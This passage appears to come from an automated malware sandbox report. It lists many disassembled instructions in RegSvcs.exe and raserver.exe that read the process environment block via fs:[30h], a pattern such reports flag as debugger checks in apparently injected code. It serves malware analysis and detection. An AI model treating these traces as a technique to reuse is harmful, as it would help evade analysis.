            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]1_2_01663D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]1_2_01663D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]1_2_01663D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]1_2_01663D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]1_2_01663D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]1_2_01663D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01684D3B mov eax, dword ptr fs:[00000030h]1_2_01684D3B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01684D3B mov eax, dword ptr fs:[00000030h]1_2_01684D3B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01684D3B mov eax, dword ptr fs:[00000030h]1_2_01684D3B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165AD30 mov eax, dword ptr fs:[00000030h]1_2_0165AD30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016DA537 mov eax, dword ptr fs:[00000030h]1_2_016DA537
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01708DF1 mov eax, dword ptr fs:[00000030h]1_2_01708DF1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166D5E0 mov eax, dword ptr fs:[00000030h]1_2_0166D5E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166D5E0 mov eax, dword ptr fs:[00000030h]1_2_0166D5E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171FDE2 mov eax, dword ptr fs:[00000030h]1_2_0171FDE2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171FDE2 mov eax, dword ptr fs:[00000030h]1_2_0171FDE2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171FDE2 mov eax, dword ptr fs:[00000030h]1_2_0171FDE2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171FDE2 mov eax, dword ptr fs:[00000030h]1_2_0171FDE2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6DC9 mov eax, dword ptr fs:[00000030h]1_2_016D6DC9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6DC9 mov eax, dword ptr fs:[00000030h]1_2_016D6DC9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6DC9 mov eax, dword ptr fs:[00000030h]1_2_016D6DC9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6DC9 mov ecx, dword ptr fs:[00000030h]1_2_016D6DC9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6DC9 mov eax, dword ptr fs:[00000030h]1_2_016D6DC9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6DC9 mov eax, dword ptr fs:[00000030h]1_2_016D6DC9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016835A1 mov eax, dword ptr fs:[00000030h]1_2_016835A1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01681DB5 mov eax, dword ptr fs:[00000030h]1_2_01681DB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01681DB5 mov eax, dword ptr fs:[00000030h]1_2_01681DB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01681DB5 mov eax, dword ptr fs:[00000030h]1_2_01681DB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_017205AC mov eax, dword ptr fs:[00000030h]1_2_017205AC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_017205AC mov eax, dword ptr fs:[00000030h]1_2_017205AC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01682581 mov eax, dword ptr fs:[00000030h]1_2_01682581
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01682581 mov eax, dword ptr fs:[00000030h]1_2_01682581
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01682581 mov eax, dword ptr fs:[00000030h]1_2_01682581
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01682581 mov eax, dword ptr fs:[00000030h]1_2_01682581
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01652D8A mov eax, dword ptr fs:[00000030h]1_2_01652D8A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01652D8A mov eax, dword ptr fs:[00000030h]1_2_01652D8A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01652D8A mov eax, dword ptr fs:[00000030h]1_2_01652D8A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01652D8A mov eax, dword ptr fs:[00000030h]1_2_01652D8A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01652D8A mov eax, dword ptr fs:[00000030h]1_2_01652D8A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168FD9B mov eax, dword ptr fs:[00000030h]1_2_0168FD9B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168FD9B mov eax, dword ptr fs:[00000030h]1_2_0168FD9B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167746D mov eax, dword ptr fs:[00000030h]1_2_0167746D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168A44B mov eax, dword ptr fs:[00000030h]1_2_0168A44B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016EC450 mov eax, dword ptr fs:[00000030h]1_2_016EC450
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016EC450 mov eax, dword ptr fs:[00000030h]1_2_016EC450
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168BC2C mov eax, dword ptr fs:[00000030h]1_2_0168BC2C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6C0A mov eax, dword ptr fs:[00000030h]1_2_016D6C0A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6C0A mov eax, dword ptr fs:[00000030h]1_2_016D6C0A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6C0A mov eax, dword ptr fs:[00000030h]1_2_016D6C0A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6C0A mov eax, dword ptr fs:[00000030h]1_2_016D6C0A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]1_2_01711C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]1_2_01711C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]1_2_01711C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]1_2_01711C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]1_2_01711C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]1_2_01711C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]1_2_01711C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]1_2_01711C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]1_2_01711C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]1_2_01711C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]1_2_01711C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]1_2_01711C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]1_2_01711C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]1_2_01711C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0172740D mov eax, dword ptr fs:[00000030h]1_2_0172740D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0172740D mov eax, dword ptr fs:[00000030h]1_2_0172740D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0172740D mov eax, dword ptr fs:[00000030h]1_2_0172740D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_017114FB mov eax, dword ptr fs:[00000030h]1_2_017114FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6CF0 mov eax, dword ptr fs:[00000030h]1_2_016D6CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6CF0 mov eax, dword ptr fs:[00000030h]1_2_016D6CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6CF0 mov eax, dword ptr fs:[00000030h]1_2_016D6CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01728CD6 mov eax, dword ptr fs:[00000030h]1_2_01728CD6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166849B mov eax, dword ptr fs:[00000030h]1_2_0166849B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166FF60 mov eax, dword ptr fs:[00000030h]1_2_0166FF60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01728F6A mov eax, dword ptr fs:[00000030h]1_2_01728F6A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166EF40 mov eax, dword ptr fs:[00000030h]1_2_0166EF40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01654F2E mov eax, dword ptr fs:[00000030h]1_2_01654F2E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01654F2E mov eax, dword ptr fs:[00000030h]1_2_01654F2E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168E730 mov eax, dword ptr fs:[00000030h]1_2_0168E730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168A70E mov eax, dword ptr fs:[00000030h]1_2_0168A70E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168A70E mov eax, dword ptr fs:[00000030h]1_2_0168A70E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167F716 mov eax, dword ptr fs:[00000030h]1_2_0167F716
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016EFF10 mov eax, dword ptr fs:[00000030h]1_2_016EFF10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016EFF10 mov eax, dword ptr fs:[00000030h]1_2_016EFF10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0172070D mov eax, dword ptr fs:[00000030h]1_2_0172070D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0172070D mov eax, dword ptr fs:[00000030h]1_2_0172070D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016937F5 mov eax, dword ptr fs:[00000030h]1_2_016937F5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01668794 mov eax, dword ptr fs:[00000030h]1_2_01668794
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D7794 mov eax, dword ptr fs:[00000030h]1_2_016D7794
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D7794 mov eax, dword ptr fs:[00000030h]1_2_016D7794
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D7794 mov eax, dword ptr fs:[00000030h]1_2_016D7794
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166766D mov eax, dword ptr fs:[00000030h]1_2_0166766D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167AE73 mov eax, dword ptr fs:[00000030h]1_2_0167AE73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167AE73 mov eax, dword ptr fs:[00000030h]1_2_0167AE73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167AE73 mov eax, dword ptr fs:[00000030h]1_2_0167AE73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167AE73 mov eax, dword ptr fs:[00000030h]1_2_0167AE73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167AE73 mov eax, dword ptr fs:[00000030h]1_2_0167AE73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01667E41 mov eax, dword ptr fs:[00000030h]1_2_01667E41
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01667E41 mov eax, dword ptr fs:[00000030h]1_2_01667E41
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01667E41 mov eax, dword ptr fs:[00000030h]1_2_01667E41
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01667E41 mov eax, dword ptr fs:[00000030h]1_2_01667E41
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01667E41 mov eax, dword ptr fs:[00000030h]1_2_01667E41
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01667E41 mov eax, dword ptr fs:[00000030h]1_2_01667E41
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171AE44 mov eax, dword ptr fs:[00000030h]1_2_0171AE44
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171AE44 mov eax, dword ptr fs:[00000030h]1_2_0171AE44
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165E620 mov eax, dword ptr fs:[00000030h]1_2_0165E620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0170FE3F mov eax, dword ptr fs:[00000030h]1_2_0170FE3F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165C600 mov eax, dword ptr fs:[00000030h]1_2_0165C600
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165C600 mov eax, dword ptr fs:[00000030h]1_2_0165C600
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165C600 mov eax, dword ptr fs:[00000030h]1_2_0165C600
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01688E00 mov eax, dword ptr fs:[00000030h]1_2_01688E00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168A61C mov eax, dword ptr fs:[00000030h]1_2_0168A61C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168A61C mov eax, dword ptr fs:[00000030h]1_2_0168A61C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711608 mov eax, dword ptr fs:[00000030h]1_2_01711608
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016676E2 mov eax, dword ptr fs:[00000030h]1_2_016676E2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016816E0 mov ecx, dword ptr fs:[00000030h]1_2_016816E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01728ED6 mov eax, dword ptr fs:[00000030h]1_2_01728ED6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016836CC mov eax, dword ptr fs:[00000030h]1_2_016836CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01698EC7 mov eax, dword ptr fs:[00000030h]1_2_01698EC7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0170FEC0 mov eax, dword ptr fs:[00000030h]1_2_0170FEC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D46A7 mov eax, dword ptr fs:[00000030h]1_2_016D46A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01720EA5 mov eax, dword ptr fs:[00000030h]1_2_01720EA5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01720EA5 mov eax, dword ptr fs:[00000030h]1_2_01720EA5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01720EA5 mov eax, dword ptr fs:[00000030h]1_2_01720EA5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016EFE87 mov eax, dword ptr fs:[00000030h]1_2_016EFE87
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DEB8D0 mov eax, dword ptr fs:[00000030h]4_2_04DEB8D0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DEB8D0 mov ecx, dword ptr fs:[00000030h]4_2_04DEB8D0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DEB8D0 mov eax, dword ptr fs:[00000030h]4_2_04DEB8D0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DEB8D0 mov eax, dword ptr fs:[00000030h]4_2_04DEB8D0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DEB8D0 mov eax, dword ptr fs:[00000030h]4_2_04DEB8D0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DEB8D0 mov eax, dword ptr fs:[00000030h]4_2_04DEB8D0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E114FB mov eax, dword ptr fs:[00000030h]4_2_04E114FB
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD6CF0 mov eax, dword ptr fs:[00000030h]4_2_04DD6CF0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD6CF0 mov eax, dword ptr fs:[00000030h]4_2_04DD6CF0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD6CF0 mov eax, dword ptr fs:[00000030h]4_2_04DD6CF0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E28CD6 mov eax, dword ptr fs:[00000030h]4_2_04E28CD6
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D558EC mov eax, dword ptr fs:[00000030h]4_2_04D558EC
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D6849B mov eax, dword ptr fs:[00000030h]4_2_04D6849B
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D59080 mov eax, dword ptr fs:[00000030h]4_2_04D59080
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD3884 mov eax, dword ptr fs:[00000030h]4_2_04DD3884
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD3884 mov eax, dword ptr fs:[00000030h]4_2_04DD3884
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8F0BF mov ecx, dword ptr fs:[00000030h]4_2_04D8F0BF
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8F0BF mov eax, dword ptr fs:[00000030h]4_2_04D8F0BF
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8F0BF mov eax, dword ptr fs:[00000030h]4_2_04D8F0BF
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D990AF mov eax, dword ptr fs:[00000030h]4_2_04D990AF
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D820A0 mov eax, dword ptr fs:[00000030h]4_2_04D820A0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D820A0 mov eax, dword ptr fs:[00000030h]4_2_04D820A0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D820A0 mov eax, dword ptr fs:[00000030h]4_2_04D820A0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D820A0 mov eax, dword ptr fs:[00000030h]4_2_04D820A0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D820A0 mov eax, dword ptr fs:[00000030h]4_2_04D820A0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D820A0 mov eax, dword ptr fs:[00000030h]4_2_04D820A0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D70050 mov eax, dword ptr fs:[00000030h]4_2_04D70050
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D70050 mov eax, dword ptr fs:[00000030h]4_2_04D70050
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DEC450 mov eax, dword ptr fs:[00000030h]4_2_04DEC450
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DEC450 mov eax, dword ptr fs:[00000030h]4_2_04DEC450
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E12073 mov eax, dword ptr fs:[00000030h]4_2_04E12073
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8A44B mov eax, dword ptr fs:[00000030h]4_2_04D8A44B
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E21074 mov eax, dword ptr fs:[00000030h]4_2_04E21074
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D7746D mov eax, dword ptr fs:[00000030h]4_2_04D7746D
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD7016 mov eax, dword ptr fs:[00000030h]4_2_04DD7016
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD7016 mov eax, dword ptr fs:[00000030h]4_2_04DD7016
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD7016 mov eax, dword ptr fs:[00000030h]4_2_04DD7016
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD6C0A mov eax, dword ptr fs:[00000030h]4_2_04DD6C0A
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD6C0A mov eax, dword ptr fs:[00000030h]4_2_04DD6C0A
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD6C0A mov eax, dword ptr fs:[00000030h]4_2_04DD6C0A
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD6C0A mov eax, dword ptr fs:[00000030h]4_2_04DD6C0A
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]4_2_04E11C06
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]4_2_04E11C06
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]4_2_04E11C06
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]4_2_04E11C06
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]4_2_04E11C06
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]4_2_04E11C06
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]4_2_04E11C06
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]4_2_04E11C06
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]4_2_04E11C06
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]4_2_04E11C06
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]4_2_04E11C06
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]4_2_04E11C06
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]4_2_04E11C06
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]4_2_04E11C06
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E2740D mov eax, dword ptr fs:[00000030h]4_2_04E2740D
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E2740D mov eax, dword ptr fs:[00000030h]4_2_04E2740D
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E2740D mov eax, dword ptr fs:[00000030h]4_2_04E2740D
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8BC2C mov eax, dword ptr fs:[00000030h]4_2_04D8BC2C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8002D mov eax, dword ptr fs:[00000030h]4_2_04D8002D
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8002D mov eax, dword ptr fs:[00000030h]4_2_04D8002D
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8002D mov eax, dword ptr fs:[00000030h]4_2_04D8002D
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8002D mov eax, dword ptr fs:[00000030h]4_2_04D8002D
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8002D mov eax, dword ptr fs:[00000030h]4_2_04D8002D
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E24015 mov eax, dword ptr fs:[00000030h]4_2_04E24015
